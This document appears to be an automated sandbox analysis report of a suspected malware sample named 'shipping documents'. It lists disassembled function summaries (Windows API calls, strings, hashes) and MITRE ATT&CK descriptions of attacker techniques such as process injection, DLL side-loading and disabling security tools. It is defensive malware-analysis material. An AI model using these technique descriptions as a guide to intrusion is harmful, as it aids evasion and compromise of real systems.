Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 3a286f0e741e74da30d0556a6bf8e2966c47ae42b99f0b923433011a89255baf
Instruction ID: 5088d820a2ba2f6145886cff74d6dbf902f4b5c81597bbba490bfa0995832980
Opcode Fuzzy Hash: 3a286f0e741e74da30d0556a6bf8e2966c47ae42b99f0b923433011a89255baf
Instruction Fuzzy Hash: F3119871B002096FEF119F14CC90EFB376BEB953A4F114126F9589B3D0D6759C5187A0

Function 006D6E76 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00651D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00651D73
Part of subcall function 00651D35: GetStockObject.GDI32(00000011), ref: 00651D87
Part of subcall function 00651D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00651D91

GetWindowRect.USER32(00000000,?), ref: 006D6EE0
GetSysColor.USER32(00000012), ref: 006D6EFA

Strings

static, xrefs: 006D6EBD

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 3630c65e92baeb0d82f58efc14c168a0718471e65f0ce49d7700e7dfdaf111c6
Instruction ID: 0329a2c2a41b0cd8e32a51163ae40ac89671c9fce113ae2222a802dd7e3940e3
Opcode Fuzzy Hash: 3630c65e92baeb0d82f58efc14c168a0718471e65f0ce49d7700e7dfdaf111c6
Instruction Fuzzy Hash: B8215972A10209AFDB04DFA8DC45AEA7BBAFB08314F01462AFD55D3250D734E8619B50

Function 006D6B8F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 006D6C11
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 006D6C20

Strings

edit, xrefs: 006D6BF5

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: eff033097b1a870db3195c1c11ddc678cd646dbfe2b75ed0c14bdb32117a95ff
Instruction ID: 01336e12911c9ac528bbcebfb4354428dcc64d7dca39aca1771ee0ac16565c6f
Opcode Fuzzy Hash: eff033097b1a870db3195c1c11ddc678cd646dbfe2b75ed0c14bdb32117a95ff
Instruction Fuzzy Hash: 9D116A71911208ABEB108F64DC41AEA3B6BEB15368F218726F961D73E0C775DCA19B60

Function 006B2E9E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006B2F11
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 006B2F30

Strings

0, xrefs: 006B2F07

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: e779cdf56132c0fbbc1db8473f327b3c4e8ab97bfa575aa455c9bfce24c3bf91
Instruction ID: f512bd4cb2b92bfd5c2c50b6040408d5520ff95bca719723f58df9f85045fb8a
Opcode Fuzzy Hash: e779cdf56132c0fbbc1db8473f327b3c4e8ab97bfa575aa455c9bfce24c3bf91
Instruction Fuzzy Hash: AD11E2B1901216ABDB20DB58DD54BE977FFEB05310F0880B5E864A73A0D7B0EE86C795

Function 006C24CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 006C2520
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 006C2549

Strings

<local>, xrefs: 006C2511

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 4e884b5ee0a7ae36afd8556ea19f9637549e054691aeb0aa06b67494fd2a8dc1
Instruction ID: bd2f864aabd82f9ebb9d5069290b58af7ec35b31e5e63789856921a0dd1c40b3
Opcode Fuzzy Hash: 4e884b5ee0a7ae36afd8556ea19f9637549e054691aeb0aa06b67494fd2a8dc1
Instruction Fuzzy Hash: D011A0B0501226BADB288F55CCA9FFBFFAAFB06751F50812EFD0556140D270A991DAE0

Function 006C80A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON

Download Yara Rule

APIs

Part of subcall function 006C830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,006C80C8,?,00000000,?,?), ref: 006C8322

inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 006C80CB
htons.WSOCK32(00000000,?,00000000), ref: 006C8108

Strings

255.255.255.255, xrefs: 006C80E3

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: ByteCharMultiWidehtonsinet_addr
String ID: 255.255.255.255
API String ID: 2496851823-2422070025
Opcode ID: bf55988d9c2ec18a90b6381e81363d5104eaa3a10c13533cf5b017b856d73e5a
Instruction ID: 1492362ff99cd763dec61d00dbd86c620c27ac8c6dba85d65c03720207194781
Opcode Fuzzy Hash: bf55988d9c2ec18a90b6381e81363d5104eaa3a10c13533cf5b017b856d73e5a
Instruction Fuzzy Hash: 1411CE34600206ABCB20AFA4CC46FFEB366EF15320F14852FE91297291DB32A805C699

Function 00660A8D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00653C26,007162F8,?,?,?), ref: 00660ACE

Part of subcall function 00657D2C: _memmove.LIBCMT ref: 00657D66

_wcscat.LIBCMT ref: 006950E1

Strings

cq, xrefs: 00660B0E

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: FullNamePath_memmove_wcscat
String ID: cq
API String ID: 257928180-2380524882
Opcode ID: d737e050f98f03870877b18f134043bf499340bdd1da84226a2ff54b854527ba
Instruction ID: 2de09a684d016322c9f675665fb1383645993ac16e5900e992d35bfa7a0607e8
Opcode Fuzzy Hash: d737e050f98f03870877b18f134043bf499340bdd1da84226a2ff54b854527ba
Instruction Fuzzy Hash: 0C11A53490420C9B8B41EB64DC01EEA73BAEF08350F0141BAB959D7281EA74DB888755

Function 006A92E7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00657F41: _memmove.LIBCMT ref: 00657F82

Part of subcall function 006AB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 006AB0E7

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 006A9355

Strings

ComboBox, xrefs: 006A92F4
ListBox, xrefs: 006A931F

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 5022c6c4b1b2b41651995cb2f117d2a99e33d101ae84b8d1ce8c1638a15e0afd
Instruction ID: f2233ca9314229d116a6593348bc0d1913c6fe90b3474367aa5c6bd31829c46d
Opcode Fuzzy Hash: 5022c6c4b1b2b41651995cb2f117d2a99e33d101ae84b8d1ce8c1638a15e0afd
Instruction Fuzzy Hash: 15019E71A05214ABCF04FBA4CC958FE77ABBF07320B240619B972572D2DB316D0C9A60

Function 006A91DF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00657F41: _memmove.LIBCMT ref: 00657F82

Part of subcall function 006AB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 006AB0E7

SendMessageW.USER32(?,00000180,00000000,?), ref: 006A924D

Strings

ComboBox, xrefs: 006A91EC
ListBox, xrefs: 006A9217

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: fa7885160edcb5be2ba279e0be4f393c86d08e6af9c8f9b1ffe1e82006aecef1
Instruction ID: a561637c77d205532f3cfebe89543df069b16ce99b2bdac7691faf8a6e418af8
Opcode Fuzzy Hash: fa7885160edcb5be2ba279e0be4f393c86d08e6af9c8f9b1ffe1e82006aecef1
Instruction Fuzzy Hash: D3018471E51204BBCB14FBA0C996EFF73AA9F46300F240119B913672D2EA156F1C9A75

Function 006A9264 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00657F41: _memmove.LIBCMT ref: 00657F82

Part of subcall function 006AB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 006AB0E7

SendMessageW.USER32(?,00000182,?,00000000), ref: 006A92D0

Strings

ComboBox, xrefs: 006A9271
ListBox, xrefs: 006A929C

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: ab2d72acdcbc4ff02f9efb7b2f2b0149f19959657e4d9bfee8d20153acb6c96e
Instruction ID: f4bfb12aa5e134039084ed9234ced8cef279e6a17a1451b3e718d2244b187b5f
Opcode Fuzzy Hash: ab2d72acdcbc4ff02f9efb7b2f2b0149f19959657e4d9bfee8d20153acb6c96e
Instruction Fuzzy Hash: 2A01A2B1E51208B7CB04FBA4C996EFF77AE9F12301F240119B912632C2DA259F0C9A75

Function 00676DAE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 00676DD0
__calloc_crt.LIBCMT ref: 00676DE9

Strings

@Rq, xrefs: 00676E00

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: __calloc_crt
String ID: @Rq
API String ID: 3494438863-542386862
Opcode ID: c35c03a646aeef0fafb257f1eb835f797fc0f970a5aaabc763d4ab8e9aa593fb
Instruction ID: 82bfff7c3280331fda400c97e0de7606545ee3a58f0b7e7aaedfedba5f5073e1
Opcode Fuzzy Hash: c35c03a646aeef0fafb257f1eb835f797fc0f970a5aaabc763d4ab8e9aa593fb
Instruction Fuzzy Hash: 0BF06D71759A169FF778CF2CFD11AE12796FB04720B10C53AF209CB2D0EB3888818698

Function 006B51CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 006B51E8
_wcscmp.LIBCMT ref: 006B51FA

Strings

#32770, xrefs: 006B51F4

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: 383da1b0ae79632d00eb7a376d42725d956d9741c9a31191479af62000c76ae7
Instruction ID: 45d4288297184a6806458337c27069cdf19a9f21b22866580eeff7afcc14fb6f
Opcode Fuzzy Hash: 383da1b0ae79632d00eb7a376d42725d956d9741c9a31191479af62000c76ae7
Instruction Fuzzy Hash: B3E02B7290132826E7109699AC05BD7F7ACEB44721F00016BFD14D3140D5709A4487D4

Function 006A81BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 006A81CA

Part of subcall function 00673598: _doexit.LIBCMT ref: 006735A2

Strings

Error allocating memory., xrefs: 006A81C3
AutoIt, xrefs: 006A81BE

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: fb41dfd367ea7730cc349338bfa670ba11cfd364df859e32cdea1462b76c18b4
Instruction ID: 3a10eab90766a78f20b26511ce3a0d55c206ce85cca688fa6b0064db6ba25f54
Opcode Fuzzy Hash: fb41dfd367ea7730cc349338bfa670ba11cfd364df859e32cdea1462b76c18b4
Instruction Fuzzy Hash: 62D0C2322C535832D25033A86C06BC6268A4B06B52F10801ABB08995D38DD58CC1529C

Function 0068B511 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 0068B564: _memset.LIBCMT ref: 0068B571

Part of subcall function 00670B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0068B540,?,?,?,0065100A), ref: 00670B89

IsDebuggerPresent.KERNEL32(?,?,?,0065100A), ref: 0068B544
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0065100A), ref: 0068B553

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0068B54E

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3158253471-631824599
Opcode ID: 6ba7c0e9abee62cf1e91532675fbf33c2ab1bf4e3bb02de441c6c5b8710a3690
Instruction ID: bb43039f74b7abd4b271daf14e44cc3cec82f77b11f0e7b3ae333adc8370aba3
Opcode Fuzzy Hash: 6ba7c0e9abee62cf1e91532675fbf33c2ab1bf4e3bb02de441c6c5b8710a3690
Instruction Fuzzy Hash: 92E092B06003128FD360EF28D8043427BE2AF04704F05CA2DE946C37A0E7B8D548CFA2

Function 006D5BEB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 006D5BF5
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 006D5C08

Part of subcall function 006B54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 006B555E

Strings

Shell_TrayWnd, xrefs: 006D5BEE

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 7916114f41fff1599c72f2df4c6cbfcb938edb3379a6f18e230a1ee4b633731f
Instruction ID: e8f12c75d2d737923bbd36ac3f993be6b642a9f5b8a196295cf5bbaffd8b92f0
Opcode Fuzzy Hash: 7916114f41fff1599c72f2df4c6cbfcb938edb3379a6f18e230a1ee4b633731f
Instruction Fuzzy Hash: 0FD0A931788300B6E368AB30AC0BFD32B62AB00B00F04082AB206AA0D0C8E49801C200

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

